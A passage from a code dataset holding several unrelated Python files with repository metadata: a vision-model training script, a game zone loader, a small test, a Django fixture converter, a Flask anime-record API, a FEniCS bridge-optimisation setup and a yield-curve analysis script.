cfg.dataloader.extra_task[task].get(\"final_iter_only\", False)\n task_eval_period = cfg.dataloader.extra_task[task].get(\"eval_period\", 1)\n if not final_iter and (task_final_iter_only or next_iter % task_eval_period != 0):\n logger.info(\n f\"Skip {task} evaluation at iter {next_iter}, \"\n f\"since task_final_iter_only={task_final_iter_only}, \"\n f\"next_iter {next_iter} % task_eval_period {task_eval_period}\"\n f\"={next_iter % task_eval_period} != 0\"\n )\n continue\n\n logger.info(f\"Evaluating extra task: {task}\")\n loader = instantiate(cfg.dataloader.extra_task[task].loader)\n\n # poping _with_dataset_\n if isinstance(cfg.dataloader.extra_task[task].evaluator, MutableSequence):\n for i in range(len(cfg.dataloader.extra_task[task].evaluator)):\n if cfg.dataloader.extra_task[task].evaluator[i].pop(\"_with_dataset_\", False):\n cfg.dataloader.extra_task[task].evaluator[\n i\n ].dataset = get_dataset_from_loader(loader)\n else:\n if cfg.dataloader.extra_task[task].evaluator.pop(\"_with_dataset_\", False):\n cfg.dataloader.extra_task[task].evaluator.dataset = get_dataset_from_loader(\n loader\n )\n\n if \"wrapper\" in cfg.dataloader.extra_task[task]:\n wrapper_cfg = cfg.dataloader.extra_task[task].wrapper\n # look for the last wrapper\n while \"model\" in wrapper_cfg:\n 
wrapper_cfg = wrapper_cfg.model\n wrapper_cfg.model = get_model_from_module(model)\n # poping _with_dataset_\n if wrapper_cfg.pop(\"_with_dataset_\", False):\n wrapper_cfg.dataset = get_dataset_from_loader(loader)\n inference_model = create_ddp_model(\n instantiate(cfg.dataloader.extra_task[task].wrapper)\n )\n else:\n inference_model = model\n\n ret = inference_on_dataset(\n inference_model,\n loader,\n instantiate(cfg.dataloader.extra_task[task].evaluator),\n use_amp=cfg.train.amp.enabled,\n )\n print_csv_format(ret)\n all_ret.update(ret)\n logger.info(\"Evaluation results for all tasks:\")\n print_csv_format(all_ret)\n return all_ret\n\n\ndef do_train(args, cfg):\n \"\"\"\n Args:\n cfg: an object with the following attributes:\n model: instantiate to a module\n dataloader.{train,test}: instantiate to dataloaders\n dataloader.evaluator: instantiate to evaluator for test set\n optimizer: instantaite to an optimizer\n lr_multiplier: instantiate to a fvcore scheduler\n train: other misc config defined in `configs/common/train.py`, including:\n output_dir (str)\n init_checkpoint (str)\n amp.enabled (bool)\n max_iter (int)\n eval_period, log_period (int)\n device (str)\n checkpointer (dict)\n ddp (dict)\n \"\"\"\n logger = logging.getLogger(\"odise\")\n # set wandb resume before create writer\n cfg.train.wandb.resume = args.resume and ODISECheckpointer.has_checkpoint_in_dir(\n cfg.train.output_dir\n )\n # create writers at the beginning for W&B logging\n if comm.is_main_process():\n writers = default_writers(cfg)\n comm.synchronize()\n\n # not sure why d2 use ExitStack(), maybe easier for multiple context\n with ExitStack() as stack:\n stack.enter_context(\n WriterStack(\n logger=logger,\n writers=writers if comm.is_main_process() else None,\n )\n )\n logger.info(f\"Wandb resume: {cfg.train.wandb.resume}\")\n # log config again for w&b\n logger.info(f\"Config:\\n{LazyConfig.to_py(cfg)}\")\n\n model = instantiate_odise(cfg.model)\n model.to(cfg.train.device)\n\n cfg.optimizer.params.model = model\n optim = instantiate(cfg.optimizer)\n\n train_loader = instantiate(cfg.dataloader.train)\n\n if cfg.train.amp.enabled:\n model = create_ddp_model(model, **cfg.train.ddp)\n trainer = AMPTrainer(model, train_loader, optim, grad_clip=cfg.train.grad_clip)\n else:\n model = create_ddp_model(model, **cfg.train.ddp)\n trainer = SimpleTrainer(model, train_loader, optim, grad_clip=cfg.train.grad_clip)\n\n checkpointer = ODISECheckpointer(\n model,\n cfg.train.output_dir,\n trainer=trainer,\n )\n\n # set wandb resume before create writer\n cfg.train.wandb.resume = args.resume and checkpointer.has_checkpoint()\n logger.info(f\"Wandb resume: {cfg.train.wandb.resume}\")\n\n trainer.register_hooks(\n [\n hooks.IterationTimer(),\n hooks.LRScheduler(scheduler=instantiate(cfg.lr_multiplier)),\n hooks.PeriodicCheckpointer(checkpointer, **cfg.train.checkpointer)\n if comm.is_main_process()\n else None,\n EvalHook(cfg.train.eval_period, InferenceRunner(cfg, model)),\n hooks.BestCheckpointer(checkpointer=checkpointer, **cfg.train.best_checkpointer)\n if comm.is_main_process() and \"best_checkpointer\" in cfg.train\n else None,\n hooks.PeriodicWriter(\n writers=writers,\n period=cfg.train.log_period,\n )\n if comm.is_main_process()\n else None,\n ]\n )\n comm.synchronize()\n\n checkpointer.resume_or_load(cfg.train.init_checkpoint, resume=args.resume)\n if args.resume and checkpointer.has_checkpoint():\n # The checkpoint stores the training iteration that just finished, thus we start\n # at the next iteration\n start_iter 
= trainer.iter + 1\n else:\n start_iter = 0\n comm.synchronize()\n # keep trainer.train() out of stack since it has try/catch handling\n trainer.train(start_iter, cfg.train.max_iter)\n\n\ndef main(args):\n cfg = LazyConfig.load(args.config_file)\n cfg.train.run_name = (\n \"${train.cfg_name}_bs${dataloader.train.total_batch_size}\" + f\"x{comm.get_world_size()}\"\n )\n if hasattr(args, \"reference_world_size\") and args.reference_world_size:\n cfg.train.reference_world_size = args.reference_world_size\n cfg = auto_scale_workers(cfg, comm.get_world_size())\n cfg.train.cfg_name = osp.splitext(osp.basename(args.config_file))[0]\n if hasattr(args, \"output\") and args.output:\n cfg.train.output_dir = args.output\n else:\n cfg.train.output_dir = osp.join(\"output\", cfg.train.run_name)\n if hasattr(args, \"tag\") and args.tag:\n cfg.train.run_tag = args.tag\n cfg.train.output_dir = osp.join(cfg.train.output_dir, cfg.train.run_tag)\n if hasattr(args, \"wandb\") and args.wandb:\n cfg.train.wandb.enable_writer = args.wandb\n cfg.train.wandb.enable_visualizer = args.wandb\n if hasattr(args, \"amp\") and args.amp:\n cfg.train.amp.enabled = args.amp\n if hasattr(args, \"init_from\") and args.init_from:\n cfg.train.init_checkpoint = args.init_from\n cfg.train.log_dir = cfg.train.output_dir\n if hasattr(args, \"log_tag\") and args.log_tag:\n cfg.train.log_dir = osp.join(cfg.train.log_dir, args.log_tag)\n cfg = LazyConfig.apply_overrides(cfg, args.opts)\n default_setup(cfg, args)\n logger = setup_logger(cfg.train.log_dir, distributed_rank=comm.get_rank(), name=\"odise\")\n\n logger.info(f\"Running with config:\\n{LazyConfig.to_py(cfg)}\")\n\n if args.eval_only:\n model = instantiate_odise(cfg.model)\n model.to(cfg.train.device)\n model = create_ddp_model(model)\n ODISECheckpointer(model, cfg.train.output_dir).resume_or_load(\n cfg.train.init_checkpoint, resume=args.resume\n )\n with ExitStack() as stack:\n stack.enter_context(\n WriterStack(\n logger=logger,\n writers=default_writers(cfg) if comm.is_main_process() else None,\n )\n )\n logger.info(do_test(cfg, model, final_iter=True))\n # Evaluation may take different time among workers.\n # A barrier make them start the next iteration together.\n comm.synchronize()\n else:\n do_train(args, cfg)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n \"odise training and evaluation script\",\n parents=[default_argument_parser()],\n add_help=False,\n )\n\n parser.add_argument(\n \"--output\",\n type=str,\n help=\"root of output folder, \" \"the full path is //\",\n )\n parser.add_argument(\"--init-from\", type=str, help=\"init from the given checkpoint\")\n parser.add_argument(\"--tag\", default=\"default\", type=str, help=\"tag of experiment\")\n parser.add_argument(\"--log-tag\", type=str, help=\"tag of experiment\")\n parser.add_argument(\"--wandb\", action=\"store_true\", help=\"Use W&B to log experiments\")\n parser.add_argument(\"--amp\", action=\"store_true\", help=\"Use AMP for mixed precision training\")\n parser.add_argument(\"--reference-world-size\", \"--ref\", type=int)\n\n args = parser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n launch(\n main,\n args.num_gpus,\n num_machines=args.num_machines,\n machine_rank=args.machine_rank,\n dist_url=args.dist_url,\n args=(args,),\n 
)\n","repo_name":"NVlabs/ODISE","sub_path":"tools/train_net.py","file_name":"train_net.py","file_ext":"py","file_size_in_byte":14939,"program_lang":"python","lang":"en","doc_type":"code","stars":711,"dataset":"github-code","pt":"22"} +{"seq_id":"23901933619","text":"from toontown.safezone import DGPlayground\nfrom toontown.safezone import SafeZoneLoader\n\n\nclass DGSafeZoneLoader(SafeZoneLoader.SafeZoneLoader):\n def __init__(self, hood, parentFSM, doneEvent):\n SafeZoneLoader.SafeZoneLoader.__init__(self, hood, parentFSM, doneEvent)\n self.playgroundClass = DGPlayground.DGPlayground\n self.musicFile = 'phase_8/audio/bgm/DG_nbrhood.ogg'\n self.activityMusicFile = 'phase_8/audio/bgm/DG_SZ.ogg'\n self.dnaFile = 'phase_8/dna/daisys_garden_sz.pdna'\n self.safeZoneStorageDNAFile = 'phase_8/dna/storage_DG_sz.pdna'\n\n def load(self):\n SafeZoneLoader.SafeZoneLoader.load(self)\n self.birdSound = list(map(base.loader.loadSfx, ['phase_8/audio/sfx/SZ_DG_bird_01.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_02.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_03.ogg',\n 'phase_8/audio/sfx/SZ_DG_bird_04.ogg']))\n\n def unload(self):\n SafeZoneLoader.SafeZoneLoader.unload(self)\n del self.birdSound","repo_name":"nate97/toontown-src-py3.0","sub_path":"toontown/safezone/DGSafeZoneLoader.py","file_name":"DGSafeZoneLoader.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"22"} +{"seq_id":"2518806031","text":"import src.calculation as calculation\n\nclass TestCal(object):\n\n @classmethod\n def setup_class(cls):\n cls.cal = calculation.Cal()\n\n def test_add_num_add_double(self):\n os_name = 'mac'\n if os_name == 'mac':\n print('ls')\n elif os_name == 'window':\n print('dir')\n assert self.cal.add_num_and_double(1, 1) == 4","repo_name":"tkedjp/pytest","sub_path":"tests/test_calculation.py","file_name":"test_calculation.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"19801843605","text":"import json\n\n\n\"\"\"\nStructure of JSON fixtures\n[\n {\"id\": 1, \"first_name\": \"Christie\", \"last_name\": \"Gann\", \"email\": \"cgann0@hostgator.com\",\n \"gender\": \"Female\", \"ip_address\": \"57.14.195.231\"}, \n {\"id\": 2, \"first_name\": \"Hamil\", \"last_name\": \"Cressey\", \"email\": \"hcressey1@delicious.com\",\n \"gender\": \"Male\", \"ip_address\": \"45.225.25.145\"}, ...\n]\n\nFixtures files must match django serialization format, e.g:\n[\n {\n \"pk\": \"4b678b301dfd8a4e0dad910de3ae245b\",\n \"model\": \"sessions.session\",\n \"fields\": {\n \"expire_date\": \"2013-01-16T08:16:59.844Z\",\n ...\n }\n }, ...\n]\n\nSo we need to rewrite the fixtures in the following way:\n- Add model key\n- Add pk field\n- Move the rest of fields to fields inner object\n\n\"\"\"\n\nUSER_FIXTURE_PATH = 'users.json'\nUSER_STATISTIC_FIXTURE_PATH = 'users_statistic.json'\n\nRESULT_USER_FIXTURE_PATH = 'serialized_user.json'\nRESULT_USER_STATISTIC_FIXTURE_PATH = 'serialized_statistic_user.json'\n\n\n# Serialize json for User model\nwith open(USER_FIXTURE_PATH, 'r') as json_file:\n # Result JSON data\n data = []\n\n json_file = json.loads(json_file.read())\n\n for obj in json_file:\n new_obj = {\n 'pk': obj.get('id'),\n 'model': 'core.User',\n 'fields': obj\n }\n data.append(new_obj)\n\n # Writes serialized data into new json\n with open(RESULT_USER_FIXTURE_PATH, 'w') as result_json_file:\n print(RESULT_USER_FIXTURE_PATH)\n print('Serialized successfuly 
!!!')\n        result_json_file.write(json.dumps(data))\n\n\n# Serialize json for Statistic model\nwith open(USER_STATISTIC_FIXTURE_PATH, 'r') as json_file:\n    # Result JSON data\n    data = []\n\n    json_file = json.loads(json_file.read())\n\n    for pk, obj in enumerate(json_file, start=1):\n        new_obj = {\n            'pk': pk,\n            'model': 'core.Statistic',\n            'fields': obj\n        }\n        data.append(new_obj)\n\n    # Writes serialized data into new json\n    with open(RESULT_USER_STATISTIC_FIXTURE_PATH, 'w') as result_json_file:\n        print(RESULT_USER_STATISTIC_FIXTURE_PATH)\n        print('Serialized successfully !!!')\n        result_json_file.write(json.dumps(data))\n","repo_name":"yueow/django-stat-app","sub_path":"django_fixture_serializer.py","file_name":"django_fixture_serializer.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"33645011313","text":"import json\nimport pandas as pd\nfrom flask import Response, render_template, request\nfrom flask_restx import Api, Resource, fields\nfrom src import create_app\nfrom src.models import Anime as model\nfrom src.views import get_all, get_item, get_items_from_index, \\\n    delete_item, delete_items_from_index, \\\n    update_item_in_table, add_item\n\napp = create_app()\n\napi = Api(\n    app, \n    version='0.0.1', \n    title='Anime API',\n    description='Manage anime through the application',\n    license=\"Blah\",\n    license_url=\"blahblahblah.com\",\n    contact=\"Aashish Chaubey\",\n    contact_url=\"https://aashishchaubey.com\",\n    contact_email=\"aashish.l@acldigital.com\"\n)\n\nns_anime = api.namespace('anime', description='Anime operations')\n\nanime_model = api.model('Anime', {\n    'anime_id': fields.Integer,\n    'title': fields.String\n})\n\n@ns_anime.route('/')\nclass AnimeList(Resource):\n    '''Shows a list of all animes'''\n    def get(self):\n        \"\"\"List all animes\"\"\"\n        animes = get_all(model=model)\n        anime_list = []\n        for anime in animes:\n            new_anime = {\n                \"anime_id\": anime.anime_id,\n                \"title\": anime.title\n            }\n            anime_list.append(new_anime)\n        resp = Response(\n            response=json.dumps(anime_list),\n            status=200,\n            mimetype=\"application/json\"\n        )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n\n@ns_anime.route('/<int:idx>')\n@ns_anime.response(404, 'Anime not found')\n@ns_anime.param('idx', 'Anime identifier')\nclass Anime(Resource):\n    '''Single anime item operations - GET, UPDATE, DELETE'''\n\n    def get(self, idx):\n        \"\"\"Get a specific anime\"\"\"\n        item = get_item(model=model, idx=idx)\n        if item is None:\n            resp = render_template('error_message.html')\n        else:\n            item = {\n                \"anime_id\": idx,\n                \"title\": str(item)\n            }\n            resp = Response(\n                response=json.dumps(item),\n                status=200,\n                mimetype=\"application/json\"\n            )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n    def put(self, idx):\n        \"\"\"Update a specific anime\"\"\"\n        old_value = {\n            \"old\": str(get_item(model=model, idx=idx))\n        }\n        update_value = request.args.get('anime')\n        status = update_item_in_table(\n            model=model, idx=idx, value=update_value\n        )\n        if status == 1:\n            new_value = {\n                \"new\": str(get_item(model=model, idx=idx))\n            }\n            data = {\n                \"anime_id\": idx,\n                \"title\": [old_value, new_value]\n            }\n        else:\n            # TODO - handle the failed update status\n            data = None\n        if data is None:\n            resp = render_template('error_message.html')\n        else:\n            resp = Response(\n                response=json.dumps(data),\n                status=200,\n                mimetype=\"application/json\"\n            )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n\n    def delete(self, 
idx):\n        \"\"\"Delete a specific anime\"\"\"\n        data = delete_item(model=model, idx=idx)\n        if data is None:\n            resp = render_template('error_message.html')\n        else:\n            data = {\n                \"anime_id\": idx,\n                \"title\": str(data)\n            }\n            resp = Response(\n                response=json.dumps(data),\n                status=200,\n                mimetype=\"application/json\"\n            )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n\n@ns_anime.route('/<int:idx>/<int:rng>')\n@ns_anime.response(404, 'Anime not found')\n@ns_anime.param('idx', 'Anime identifier')\n@ns_anime.param('rng', 'Range of values')\nclass BulkAnime(Resource):\n    \"\"\"Bulk anime item operations - GET, DELETE\"\"\"\n\n    def get(self, idx, rng):\n        \"\"\"Get a `rng` list of animes starting from id:`idx`\"\"\"\n        items = get_items_from_index(model=model, idx=idx, rng=rng)\n        anime_list = []\n        for index, item in enumerate(items, idx):\n            new_anime = {\n                \"anime_id\": index,\n                \"title\": str(item)\n            }\n            anime_list.append(new_anime)\n        resp = Response(\n            response=json.dumps(anime_list),\n            status=200,\n            mimetype=\"application/json\"\n        )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n    def delete(self, idx, rng):\n        \"\"\"Delete a `rng` list of animes starting from id:`idx`\"\"\"\n        items = delete_items_from_index(model=model, idx=idx, rng=rng)\n        delete_list = []\n        for index, item in enumerate(items, idx):\n            new_anime = {\n                \"anime_id\": index,\n                \"title\": str(item)\n            }\n            delete_list.append(new_anime)\n        resp = Response(\n            response=json.dumps(delete_list),\n            status=200,\n            mimetype=\"application/json\"\n        )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n\n@ns_anime.route('/upload')\n@ns_anime.response(404, 'Anime not found')\nclass UploadAnime(Resource):\n    \"\"\"Upload anime data to database\"\"\"\n\n    def post(self):\n        \"\"\"Upload list of animes using csv data\"\"\"\n        if request.files:\n            uploaded_file = request.files['file']\n            df = pd.read_csv(uploaded_file, header=0)\n            for _, item in df.iterrows():\n                add_item(model=model, anime_id=item['anime_id'], title=item['title'])\n        resp = Response(\n            response=json.dumps({\"status\": \"Added\"}),\n            status=200,\n            mimetype=\"application/json\"\n        )\n        resp.headers['Access-Control-Allow-Origin'] = '*'\n        return resp\n\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=4996, debug=False)\n","repo_name":"aashish-chaubey/scaling-lamp","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"42257148619","text":"from fenics import *\nfrom mshr import *\nimport scipy.stats as stats\nfrom distributions.karhunen_loeve_dist import *\nfrom distributions.random_rotation import *\n\n\ndef bridge2Dstochastic():\n    resolution = 30\n    upperEnd = 1.0\n    lowerEnd = 0.0\n    leftEnd = -1.0\n    rightEnd = 1.0\n    dirichletSize = 0.1\n    neumannSize = 0.02\n\n\n    class GammaD(SubDomain):\n        def inside(self, x, on_boundary):\n            return on_boundary and near(x[1], 0) and (leftEnd <= x[0] <= (leftEnd + dirichletSize))\n\n    class GammaS(SubDomain):\n        def inside(self, x, on_boundary):\n            return on_boundary and near(x[1], 0) and ((rightEnd - dirichletSize) <= x[0] <= rightEnd)\n\n    class GammaG(SubDomain):\n        def inside(self, x, on_boundary):\n            return on_boundary and near(x[1], 0) and -neumannSize <= x[0] <= neumannSize\n\n    domain = (Rectangle(Point(leftEnd, lowerEnd), Point(leftEnd + dirichletSize, upperEnd))\n              + Rectangle(Point(leftEnd + dirichletSize, lowerEnd), Point(-neumannSize, upperEnd))\n              + 
Rectangle(Point(-neumannSize, lowerEnd), Point(neumannSize, upperEnd))\n              + Rectangle(Point(neumannSize, lowerEnd), Point(rightEnd - dirichletSize, upperEnd))\n              + Rectangle(Point(rightEnd - dirichletSize, lowerEnd), Point(rightEnd, upperEnd))\n              )\n\n    mesh = generate_mesh(domain, resolution)\n\n    #mesh = RectangleMesh(Point(-1.0, 0.0), Point(1.0, 1.0), 50, 25, \"right/left\")\n\n    kl_field = KLdist(mesh, distType='lognormal', nModes=10, cov_lenght=0.1, cov_scal=1, kappaMean=150, kappaScale=100)\n    g_field = rotationdist(distType='normal_trunc', scale=0.3, mean=0, kappaMean=(0,-5000))\n\n\n    parameter = {\"mesh\": mesh,\n                 \"stochastic\": False,\n                 \"CVaR\": False,\n                 \"RandomVariables\": [([\"g\"], g_field), ([\"mu\", \"lmbda\"], kl_field)],\n                 \"g\": Constant((0, -5000)),\n                 \"phi_0\": Constant(0.5),\n                 \"gammaD\": GammaD(),\n                 \"gammaG\": GammaG(),\n                 \"gammaS\": GammaS(),\n                 \"SDir\": 1,\n                 \"lmbda\": Constant(150),\n                 \"mu\": Constant(150),\n                 \"m\": Constant(0.4),\n                 \"dim\": 2,\n                 \"nSamples\": 224,\n                 \"gamma\": Constant(1),\n                 \"gammaAdaptFactor\": Constant(0.01), # 0.1 for Beta > 0\n                 \"epsilon\": Constant(1. / 16),\n                 \"beta\": Constant(0)\n                 }\n    return parameter","repo_name":"MarvinHaa/DeepNNforTopoOptisation","sub_path":"problems/bridge2Dstochastic.py","file_name":"bridge2Dstochastic.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"28942331713","text":"#!/usr/bin/env python\n\"\"\"\nAuthor: Ethan Ho\nDate: 3/2/2023\nLicense: MIT\nUsage:\n\npython3 final_proj.py\n# or from Python3: from final_proj import main as final_proj_main\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport json\nimport math\nfrom typing import List, Dict, Tuple, Optional\nimport functools\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm, probplot\nimport quandl\nimport plotly.express as px\ntry:\n    from memoize.dataframe import memoize_df\nexcept ImportError as err:\n    print(str(err))\n    raise Exception(\n        f\"Missing dependency memoize. Please install using pip:\\n\\n\"\n        f\"pip install git+https://github.com/ethho/memoize.git\"\n    )\ntry:\n    from lmfit.models import SkewedGaussianModel\nexcept ImportError as err:\n    print(str(err))\n    raise Exception(\n        f\"Missing dependency lmfit. Please install using pip:\\n\\n\"\n        f\"pip install lmfit\"\n    )\n\nTENOR_WEEK_MAP = {\n    (1, 'm'): 4,\n    (2, 'm'): 8,\n    (3, 'm'): 13,\n    (4, 'm'): 17,\n    (6, 'm'): 26,\n    (12, 'm'): 52,\n    (1, 'y'): 52,\n    (2, 'y'): 52 * 2, # 104\n    (3, 'y'): 52 * 3, # 156\n    (5, 'y'): 52 * 5, # 260\n    (7, 'y'): 52 * 7, # 364\n    (10, 'y'): 52 * 10, # 520\n    (20, 'y'): 52 * 20, # 1040\n    (30, 'y'): 52 * 30, # 1560\n}\n\ndef get_secrets(fp='./secrets.json'):\n    \"\"\"\n    Reads secret values such as API keys from a JSON-formatted file at `fp`.\n    \"\"\"\n    with open(fp, 'r') as f:\n        data = json.load(f)\n    return data\n\ndef get_quandl_api_key() -> str:\n    \"\"\"\n    Returns Quandl API key stored in secrets.json.\n    \"\"\"\n    secrets = get_secrets()\n    key = secrets.get('NASTAQ_DATA_API_KEY')\n    assert key, f\"NASTAQ_DATA_API_KEY field in secrets.json is empty or does not exist\"\n    return key\n\ndef strip_str_dtypes(df: pd.DataFrame) -> pd.DataFrame:\n    \"\"\"\n    Given a DataFrame, strips values in columns with string or object\n    dtype. 
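The frame is modified in place and also returned for convenience.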
I noticed that this was an issue when I saw some m_ticker values\n like \"AAPL \" with trailing whitespace.\n \"\"\"\n for col in df.columns:\n if pd.api.types.is_string_dtype(df[col]) or pd.api.types.is_object_dtype(df[col]):\n df[col] = df[col].str.strip()\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_table(\n name, start_date, end_date, **kw\n) -> pd.DataFrame:\n df = quandl.get_table(\n name,\n date={'gte': start_date, 'lte': end_date},\n api_key=get_quandl_api_key(),\n paginate=True,\n **kw\n )\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n df.reset_index(inplace=True)\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_quotemedia_prices(\n start_date, end_date, ticker\n) -> pd.DataFrame:\n return fetch_quandl_table(\n name= 'QUOTEMEDIA/PRICES',\n start_date=start_date,\n end_date=end_date,\n ticker=ticker,\n )\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_yc(\n name, start_date, end_date,\n) -> pd.DataFrame:\n df = quandl.get(\n name,\n start_date=start_date,\n end_date=end_date,\n api_key=get_quandl_api_key(),\n ).reset_index().rename(columns={'Date': 'date'})\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n return df\n\n@memoize_df(cache_dir='data/memoize', cache_lifetime_days=None)\ndef fetch_quandl_spot(\n symbol, **kw\n) -> pd.DataFrame:\n df = quandl.get(\n f'CUR/{symbol}',\n **kw\n ).reset_index().rename(columns={\n 'DATE': 'date',\n 'RATE': f'USD/{symbol}',\n })\n df['date'] = pd.to_datetime(df['date'])\n df.sort_values(by='date', inplace=True)\n return df\n\ndef unique_index_keys(df, level=0) -> List[str]:\n return df.index.get_level_values(level=level).unique().tolist()\n\ndef get_next_day_of_week(date, day_of_week: int) -> str:\n \"\"\"\n Monday = 0, Wednesday = 2\n \"\"\"\n as_dt = pd.to_datetime(date)\n days_until = (day_of_week - as_dt.day_of_week) % 7\n out_dt = as_dt + pd.to_timedelta(days_until, 'D')\n return out_dt.strftime('%Y-%m-%d')\n\ndef get_standard_yc_cols(cols: List, col_prefix='') -> Dict:\n out = dict()\n for col_raw in cols:\n col = col_raw.lower()\n col = re.sub(r'-year', 'y', col)\n col = re.sub(r'-month', 'm', col)\n if col_prefix:\n col = col_prefix + '_' + col\n out[col_raw] = col\n return out\n\ndef get_yc(*args, col_prefix='', **kw):\n df = fetch_quandl_yc(*args, **kw)\n df['date'] = pd.to_datetime(df['date'])\n df.set_index('date', inplace=True)\n df.sort_index(inplace=True)\n df.rename(columns=get_standard_yc_cols(df.columns, col_prefix), inplace=True)\n return df\n\n@functools.lru_cache()\ndef get_col_groups(cols) -> Dict:\n \"\"\"\n Usage: get_col_groups(tuple(yc_daily.columns.tolist()))\n \"\"\"\n out = dict()\n for col in cols:\n prefix, tenor_raw = col.split('_')\n tenor, unit = tenor_raw[:-1], tenor_raw[-1]\n if prefix not in out:\n out[prefix] = list()\n item = {\n 'col': col,\n 'country': prefix,\n 'tenor': tenor,\n 'unit': unit\n }\n out[prefix].append(item)\n return out\n\ndef bond_price(zcb, coupon_rate, tenor, coupon_freq):\n \"\"\"\n Copied from Zero_And_Spot_Curves.ipynb\n \"\"\"\n times = np.arange(tenor, 0, step=-coupon_freq)[::-1]\n if times.shape[0] == 0:\n p = 1.0\n else:\n r = np.interp(times, zcb.index.values, zcb.values) # Linear interpolation\n p = np.exp(-tenor*r[-1]) + coupon_freq * coupon_rate * np.exp(-r*times).sum()\n # Any coupon bond can be written as the sum of zero coupon bonds\n return p\n\ndef 
tenor_wk_to_years(wk: int) -> float:\n    \"\"\"\n    Convert tenor from weeks to years.\n    \"\"\"\n    return wk / 52\n    # Equivalently,\n    # return wk * 7 / 364\n\ndef tenor_years_to_wk(yr: float) -> float:\n    \"\"\"\n    Convert tenor from years to weeks.\n    \"\"\"\n    return yr * 52\n    # Equivalently,\n    # return yr * 364 / 7\n\n\ndef _zcb_from_spot(spot, tenor, cpn_freq, spot_curve):\n    \"\"\"\n    Calculate ZCB (discount) rate for `tenor` (years) from `spot` rate,\n    assuming 1 / `cpn_freq` coupons are paid per year.\n\n    Adapted from compute_zcb_curve in Zero_And_Spot_Curves.ipynb.\n    \"\"\"\n    if tenor <= 1.:\n        # US T-bills (<=1 year maturity) have no coupons\n        return spot\n    times = np.arange(tenor-cpn_freq, 0, step=-cpn_freq)[::-1]\n    coupon_half_yr = cpn_freq * spot\n    z = np.interp(times, spot_curve.index.values, spot_curve.values)\n    preceding_coupons_val = (coupon_half_yr*np.exp(-z*times)).sum()\n    return -np.log((1-preceding_coupons_val)/(1+coupon_half_yr))/tenor\n\n\ndef zcb_from_spot(row, cpn_freq, spot_curve, **kw):\n    \"\"\"\n    Wrapper around _zcb_from_spot. Used in pd.DataFrame.apply.\n    \"\"\"\n    tenor = row.name # in years\n    spot = row.spot\n    return _zcb_from_spot(spot, tenor, cpn_freq, spot_curve)\n\n\ndef pr_from_spot(row, cpn_freq, zcb_curve, holding_period, **kw):\n    \"\"\"\n    Calculate ZCB (discount) price from `row.spot` rate, assuming 1 / `cpn_freq`\n    coupons are paid per year.\n\n    Lightweight wrapper around `bond_price` function from\n    Zero_And_Spot_Curves.ipynb\n    \"\"\"\n    tenor = row.name # in years\n    spot = row.spot\n\n    # For example T = 5 years and S = 5 years - 1 month\n    # Note that we can pass `holding_period` = 0 to get pr_t\n    T = tenor\n    S = T - holding_period\n    pr = bond_price(\n        zcb_curve,\n        # We remove the coupon interest term by setting\n        # coupon_freq = 0 iff tenor <=1 (T-bills).\n        coupon_rate=spot if tenor > 1. 
else 0,\n        tenor=S,\n        coupon_freq=cpn_freq\n    )\n    # if T == S and not pd.isnull(spot):\n    # breakpoint()\n    return pr\n\n\ndef get_zcb_curve_at_t(\n    spot_wk: pd.Series,\n    coupons_per_year=2,\n    holding_period=28/364.,\n    # Equivalently,\n    # holding_period=4/52.,\n):\n    \"\"\"\n    Given the spot rate `spot_wk` indexed by tenor (in weeks), calculate\n    zero coupon rate, zero-coupon factor (price), and forward rate & factor.\n    \"\"\"\n    cpn_freq = 1 / float(coupons_per_year)\n\n    # Arrange spot rates into a DataFrame for easier analysis\n    df = pd.DataFrame(\n        data={\n            'spot': spot_wk.values,\n        },\n        # Convert tenor index from weeks into years for below calculations\n        index=[tenor_wk_to_years(tenor_wk) for tenor_wk in spot_wk.index],\n    )\n\n    # Shared kwargs to pass to functions in apply\n    kw = dict(\n        cpn_freq=cpn_freq,\n        spot_curve=df['spot'].copy(),\n    )\n\n    # Zero-coupon rate\n    df['zcb'] = df.apply(zcb_from_spot, axis=1, **kw)\n    kw['zcb_curve'] = df['zcb'].copy(deep=True)\n    # Zero-coupon bond price at maturity S = tenor - 1 month\n    df['pr_s'] = df.apply(pr_from_spot, axis=1, holding_period=holding_period, **kw)\n    # Zero-coupon bond price at maturity T = tenor - 0 months\n    df['pr_t'] = df.apply(pr_from_spot, axis=1, holding_period=0., **kw)\n    # Forward discount factor (F)\n    df['fwd_factor'] = df.pr_t / df.pr_s\n    # Forward discount rate (f)\n    df['fwd'] = -np.log(df['fwd_factor']) / holding_period\n\n    # Convert index back from years to weeks\n    df.index = pd.Index([tenor_years_to_wk(tenor_yr) for tenor_yr in df.index])\n    # Convert to a 